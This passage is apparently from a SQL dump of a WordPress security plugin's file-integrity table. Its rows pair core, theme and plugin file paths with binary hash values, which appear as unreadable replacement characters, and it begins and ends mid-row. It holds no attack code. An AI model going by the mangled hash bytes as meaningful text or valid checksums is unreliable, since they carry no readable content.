D�?Y�v�','}�ރ:�^D�?Y�v�','#�I+h�)��]�8��C�(�#�y|ঋ�S|','',0,'?'),('��ρX�n\r��?��','wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Ʈ�u��o7;~z','����� %l�y�\'�#[���_�{E�]8�%�','',0,'?'),('�])��	���{�?R}','wp-includes/feed-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('�\'�;=^D��ܵ@E�','wp-content/themes/accelerate/js/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D\r)��7c���O','�(��B5s�TP���<pt%�FI4�L�RZ_��Y','',0,'?'),('�$��\"h8_\0����','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/extends/class-fw-option-type-builder-item.php',0,'����˅vL��F�y','����˅vL��F�y','=��k�����I~�\0=��C�0���B��','',0,'?'),('�-TUϑ�jk1hlDz�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php',0,' \'/��P?�c�!\0',' \'/��P?�c�!\0','��Mw���R��,!d��6�Bh��{-��','',0,'?'),('�0<Ps��מH��22','wp-includes/js/jquery/jquery.table-hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��֔#t�gP�g��',':��A���f�xׂ��������d�7#','',0,'?'),('�3������9`w�q','wp-content/themes/twentynineteen/style-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;9���K�K�\'��!','���5.\0��$�V�u�aˆ��+EI�H�h{ �\'','',0,'?'),('�9(F�Rj2�n6]��','wp-admin/css/colors/light/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[���y�Jl2s�t�','�I��J��Hj��ǎX|�j��cXj��5','',0,'?'),('�J���!2���\0����','wp-admin/css/about.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ���+ta#!/','O��e��ӧ�Cll\Zۜ�����f !�T�ɍ','',0,'?'),('�]	���n_�ˤ[l���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�y?>�F�\n~^�','Z��\n�\r�~YW�m���U����9Ft�Q��','',0,'?'),('�^�O�|\':QǙE���','wp-content/plugins/wordfence/views/common/status-critical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v,d��,��ȁ��','�-(wE��Cg�E��u���\"�u�7������','',0,'?'),('�g�\"�}_�7����J5','wp-includes/js/jcrop/jquery.Jcrop.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V̞��/K�x����','�2�S�[�6Dv�5bs��=���NL�w����','',0,'?'),('�v6Z�\'�O�IL\"ݕM�','wp-includes/js/dist/block-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t�ed�-u��F���,','k��������zV��˫!t�L�W?��e+�','',0,'?'),('�}�\Z��F?�Fs�v��#','wp-content/themes/twentynineteen/print.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','42�����r!�j����','�.\\��J�� ��TC~0���=�/�����','',0,'?'),('�\nv�<x^㑅�B','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.cn.php',0,'�3��C�����賺!K','�3��C�����賺!K',' vA>ŕ}҆C߾nm�w����ۃ�g@�S��','',0,'?'),('�,5X��{�e�','wp-content/plugins/wordfence/js/wfpopover.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�&m�A�hlMPZX','��_.V袏���X��4N�i_�k=��C3','',0,'?'),('���t��ݬ��/�Qy','wp-content/themes/aqueduct/inc/dragfun/dragtheme-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P؟��ׅ�o/v�f[�','}ˢ���q�q�����kA�B�%�\\�Ƴ9�v','',0,'?'),('��0�y�a�|8�]O�<','wp-content/themes/lightly/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ro�����9�C���?�','Lܥ�b4<\'�ò���d�˼_(Z\"��5�rL2','',0,'?'),('��p��9�6è�R�','wp-admin/css/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-TGa�vq9�z���e?','ݨS̳O�Ϣ�\r��m�,�\\qKY�,���n�p','',0,'?'),('�����ƪq�悳��','wp-includes/js/tinymce/plugins/paste/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���s׶�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('���D�@WYwB[OÅ�','wp-content/themes/barletta/fonts/glyphicons-halflings-regular.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v���tf�e�9� F�','t��a±�\0ӫ�I�D�v2u��\0���+�T�','',0,'?'),('��lxy�\Z����\"��','wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EU.7����H>i��;�','��,��+x>��� V���7r�LKs&��G�','',0,'?'),('��dM��/�����','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/img/sauron.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fM\n���\0��|','qP/�֛g��@%U�z�^pb���{\r4�3D','',0,'?'),('���q�L��>��#Q�\0','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����B���gY��','���:�IZ��C��Z��8�Ȱ�L��]�m�','',0,'?'),('��<l�a��,�bX,��','wp-admin/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('������4�K9?\'҆','wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�tŽ�Ћj��?�','�Gc3I��>έ��j�����_/*�D�','',0,'?'),('�Ș�SQH1�M�����','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php',0,'���l-6F�}�G&c��','���l-6F�}�G&c��','�qл���^�mVC<�ÃuɈw�����5 �','',0,'?'),('��\\�}���e��mH\'�','wp-content/themes/twentynineteen/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q5צ�O/�J�N','\r}p\'qD%�<}��&��-#=s_Oa��6��{','',0,'?'),('�Ԃ��\"Av\n���Z','wp-content/themes/sg-window/inc/customize-other.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"l4Sٳ\\���.','`[<��O)i���t�\\%qח��ؼ�Ҋ@2�','',0,'?'),('��l�|���;����','wp-content/themes/nirvana/fonts/opensans-bold-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�}�����t�i��','��y�p�w[�ʴ̀�䓈b��Q�X���IZ!�','',0,'?'),('���_��Nӊ��\rb��','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/disabled-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���[���t��9M','�U� \\�~̢xo������U�Kc�i�����W/','',0,'?'),('�����p�Ia�%�','wp-content/themes/travelify/languages/tr_TR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �4��yɛ���I�/','�G%������0\ZӳA\\�6MG\n���A�P�','',0,'?'),('��6�H���\"r>E�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-textarea-cell/static/js/scripts.js',0,'B2_�j��!j��W���','B2_�j��!j��W���','G|�F���Pȏ�鐎*�q�Q3�[{�#q�3y','',0,'?'),('��J�Y�	�F�P9','wp-content/themes/nirvana/images/socials/Reddit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S:�}�\"��DGϻ','�N�S��L�ǒ�ESq8�P=��ܞ��~׻','',0,'?'),('�i_xȳ��d�0Z.','wp-content/themes/nirvana/fonts/ubuntu-r-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`i8]�u�_��w\0 }','{�3��P�9�Y\n����s���	�\\$�E@','',0,'?'),('�	�V���Z�.��','wp-content/themes/vega/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S~�o\0���5�','``~s������p��`�����-1S#`19N','',0,'?'),('�^�f���5����+�','wp-content/themes/the-minimal/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�q���!�a]T\',}e','C4���Տ��l�=���SiX\ry���','',0,'?'),('�PKqt�Aur j','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ߠ��4�c�5:��Z\0\n','�\"�a��,��V��0�Lb[�.�T����QJ�A','',0,'?'),('��[/;���C\Z9��-','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_list-group.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?Z:���I�:','���X�=�L��t+i�NY����.�5�7dq�','',0,'?'),('�+q^e����gu�F6\n','wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�3r��\\?hQ�{��]','wp-content/plugins/unyson/framework/extensions/social/class-fw-extension-social.php',0,'&��ܗc���th�K䍢','&��ܗc���th�K䍢','q�|���:8�҇*�@Cd,-9��\"+�6���','',0,'?'),('�G���!#h�9	��&','wp-includes/js/tinymce/plugins/wordpress/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('�Kj��h���','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�P���:��v���Qw','wp-includes/blocks/list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��M�X�����zc�','���^*:�Y�K�-��7`����I�M�-�C�','',0,'?'),('�S�;D	g�N�ǀr�E�','wp-content/themes/panoramic/library/includes/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�����4��\0�=%+','�VE�j�Z,��-st\Z8��c�eGj��iy','',0,'?'),('�\\����3\0h]??�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��&\'��\rv�z','��ɘ���@����l��+X����SZjǛa�','',0,'?'),('�`Sk��7Tt�v��X�','wp-includes/class-wp-list-util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}� ��Sӕvl�T@','���Ԉ������?1l�\Z� ���ug�\',��','',0,'?'),('�r�\"�-�\0�E�w��X','wp-content/plugins/contact-form-7/modules/textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�Cb���pH��F',']A}�^��Ղ{��\'���������)\0��Ks','',0,'?'),('�us�T­B��B','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J%{O�Z\"/�o','^*�n^�\0m+��!Nk�Ɍ��/��ԯ^k','',0,'?'),('�|��MW���j(�޻','wp-content/themes/twentytwentyone/assets/js/polyfills.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���W�\\�.��A .','��b�D���Z�	6A��m�wl�r�E��0��','',0,'?'),('���ZL��O�l��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��F�h�z','oő\nw�n��pL�+;����~��t2�P*ƃ6�','',0,'?'),('��O\'�����έo��','wp-content/plugins/spam-captcha/font-2.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�73%�W��.�+ �zǚ','�^�dCғ�Q$2���D������~�zU','',0,'?'),('��H����m���R�̾','wp-content/themes/supernews/assets/library/Font-Awesome/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�W���b&�W','�}�.�����$]���%�0��R�Y�Sy�','',0,'?'),('���\'�B���7S�','wp-includes/js/zxcvbn-async.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('��{�	\n|p�٤','wp-includes/customize/class-wp-customize-nav-menu-item-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���aER>60�.)H','�K-I���6A��,\\��nQ�P���&','',0,'?'),('�����)�(��<��','wp-includes/js/json2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����x�}\'��-��8','?	��s�s��(q���c!~a�ж�H�\\y','',0,'?'),('��O��ƷO��-�','wp-content/plugins/unyson/framework/includes/option-types/multi-picker/static/js/multi-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ld�_�`�.�W�TT\r','b ֭lS�T�)(�/�u\Z�e2t�N]/k\'��','',0,'?'),('���h�= }�pI�_��','wp-content/themes/relia/sidebar-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�� Gc�2�o�\n~9','7:��.k��/�!�ͬR�-;vg\0�h\n�K��z�','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('�\0G�Q�\0�\r�6J[���','wp-content/themes/verbosa/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z��ym�b?<�','V��D�ƪ)�e.�寀�\r�Qvu��\"���A�','',0,'?'),('�&��!��$�#�b5','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/template-component/scripts.js',0,'H@..&ʸ#���x�t}E','H@..&ʸ#���x�t}E','�#[*w��M�ҏ��%?��*�]��+P�(','',0,'?'),('�*)>_��~b�/Jw�','wp-content/plugins/spam-captcha/lang/spam_captcha-ja_JP.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a\r��ک\'�����','L\Z�ԭ��f���X�q@�兕�q[���i�^�','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�>ޤ��+~�tͫ��*','I|��^ψg�?nƏA�d�����]68R��','',0,'?'),('�%�+]3��]���^','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.he.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~6ʉv&������;B5','���W%�ъ��V�#�#��ޣ��XC��S','',0,'?'),('�2�}�+�x4f��	m�X','wp-content/plugins/wordpress-seo/admin/pages/dashboard.php',0,'2�q��c$oD�uB�','2�q��c$oD�uB�','�q��\n�x�}k���u�<w��ZCJ\r��5�6','',0,'?'),('�BZ�G���w%N��','wp-content/themes/aqueduct/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F/\\�wyʳ��R�\'+','d���9OEÅ���6(�O\"Vݻ�Ū�','',0,'?'),('�C�Z�Z�f�}','wp-content/themes/hueman/assets/front/img/demo/1-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���N�VP&q��D1��','�垽3“��4#�6v=H`�ϢB���E�','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ɹ/zcW��ŒE','�d]͍��ܗ��!>;��E��ЀX&���\"�','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����w¬3Y[�i��F','�G�&Y)�e$�<��ǐ��z>\0���\ZH��','',0,'?'),('�K+��R��LQ�VH','wp-content/themes/hueman/assets/admin/img/col-2cr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f~���3�w�r��ǚe','�IP���in���e�k�:�4�Z���lӡ','',0,'?'),('�WzY!�a��vwQ^ޱ','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_75_e6e6e6_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+7\r�/v�\Z�̙*���',',�;8i��C>!)��^��@c��j�.�H+�ZP��','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5[bW{-x��E��w�;','֚u�mW?\"�b��_]���c�0�N\r`�>��','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LI�u�.�q�~�<+O��','S��\0� ��•��T�.�C)�0K���\0\ZD��','',0,'?'),('�ojdy�f�_b&xN�K�','wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h�x��T�g�/x�','(� 	7D�T��M^�����f\0��v�E','',0,'?'),('�wi�ȟ3WB����^','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_grid.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{J%y��a���w��\r','�K��+�I�I-���n���j����)���[q�','',0,'?'),('�};�1��j7�2��\r�','wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#0QY�p˚�AO�e#','4d���SHޘ4��2p⦿ו�/�?�	�G�1','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��x(���m���`��','wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc-ajax.php',0,'��\0�d�a]Ү}�D\"�','��\0�d�a]Ү}�D\"�','�ȧu��ցaw��\'Nd�n�F�m8hCϨʰb','',0,'?'),('��-�݌*ru���O�','wp-content/themes/illdy/layout/images/front-page/front-page-latest-news-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wwp3 J��F�(�','�)�Z��J��H[�\'F\Z\"�1��C�H�/��&/','',0,'?'),('���=�k�1m���','wp-content/themes/twentynineteen/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2٪V�+�T$�\0v�','��\rOK����RƩ�e�D��ړ8݃�j��0@','',0,'?'),('���ߤ�.�?�`gY��X','wp-content/themes/twentytwentyone/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�aM#ҁ�&k�$��u�','g��\r�]S�a���v�o&��7�!أ*��;{�1�','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',0,'^�!y��Wk�C�L�_�','^�!y��Wk�C�L�_�','�y[�Q\'O��(&1�r���unY����E�d�','',0,'?'),('��k�3X���#N����','wp-content/themes/vega/sample/images/featured-image-10.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mG���U�\n$��65�','P&z�0\'?+S��yl�\r����}ŪW����','',0,'?'),('��.�w�V��P�j�','wp-content/plugins/unyson/framework/views/backend-settings-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�U��	j.\'���Y','��\'�\r�ڱ5�C��r>_�&\'H|3=F��,','',0,'?'),('���c7��<��^','wp-content/themes/illdy/layout/css/bootstrap-theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�S�hB��i��@��','�)�Qkc�#~|d�C��K\n�xx�u�(�(�','',0,'?'),('����i��\Z����','wp-content/plugins/spam-captcha/core/img/tree_lastnode_minus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}63ti�\0iuʌ\nT�','�_\0n�\r\"�:\\��j-�i6f��:��pc','',0,'?'),('��j(�z�E�`�>F��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/static.php',0,'f?��]1`ɠğ���?','f?��]1`ɠğ���?','N^BҶI�=��E$QI�_O-W7eP+U�iP��','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('��b��V�f6\n4.X�p','wp-content/themes/nirvana/templates/template-page-with-intro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nu3��9���	�ۮP>','�I~v�9b�Qu��=�}+�f+�\n%��zN','',0,'?'),('��x�R���+@:D���','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ms.js',0,'�\r��u�f�����c{�','�\r��u�f�����c{�','\\���ڪ�\r�5q	C%y�eţ�>��S�/!o�\Z�','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('����—���g�\'ov�g','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/accordion/static.php',0,'��SY33!\ny���','��SY33!\ny���','�}��<�rJ���T:���5�rE��Lw�X���','',0,'?'),('�5!J�g�$�	=���','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.cy.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ls?#vW��Bέc`|','��[�L[�M� YI7\"�� c\n�y�Wl|','',0,'?'),('�3�}�Qn��=���8','wp-content/plugins/contact-form-7/languages/contact-form-7-vi.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wإ�2���*_y��','B��R��X�F\Z�@���ձ��[��]��','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�C������Q��','wp-content/themes/sg-window/page-templates/no-content-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[˹:w�_�CP�\"','7O�r�B�a)+c���%�g%�(!�~C4R','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�@O�qG9������','����1~7r�K�u��a���w9ϭI5�,��','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���셌���u���Q�','}Jr�;X��ZE̬\\Y�?���F8A�]��[Q��','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('�g2A{\'��\Z��+%�*','wp-content/themes/alpha-store/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Ӈ|fg)�h����','/��ي�t��\'yT\'V��9S~S��/Q��g','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('�viW�Z)s�U�1B�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ws.php',0,'1Y����D�xE?�`���','1Y����D�xE?�`���','}81tR��6��yA�ѧ�%_c��;1|','',0,'?'),('�v�id��V�L؞ʝ','wp-content/themes/supernews/acmethemes/customizer/design-options/sidebar-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Np�{�^2�@1C�ån','3���Icm(��7���M�tSڈ���2��&s','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('����Qs����d�','wp-content/themes/the-minimal/images/blockquote-img.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7\r؋�	{lD��D��','��;�.�F���GpLlOxk�T�2ҷ��e','',0,'?'),('���p��KS_e�eJq9','wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�Y�gs|��BMj','�����–����%*�kb$�ZR��f�i�`�','',0,'?'),('��e�9���)��m�i','wp-content/themes/point/css/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�\"�����,���ws�','�N	]1����?A��۰NW���!�>��','',0,'?'),('��S6p���i��j�n','wp-content/plugins/contact-form-7-designer/cf7-styles-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��`���=�z�0 �X','<\"[���b��I��:\"X��\r�6��3~YJ�`��','',0,'?'),('��Z��L�m?���;�','wp-content/themes/tortuga/inc/customizer/sections/customizer-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@S*�Gǩ%��Z�o','	�?t�h�M�x@�JH�\Z7٪�������','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z�	h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('����pͭ�q�����','wp-content/themes/precious-lite/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��5�{oT��c��','�l0��]�_�6�빞�R�������&^�J�','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?'),('��\r$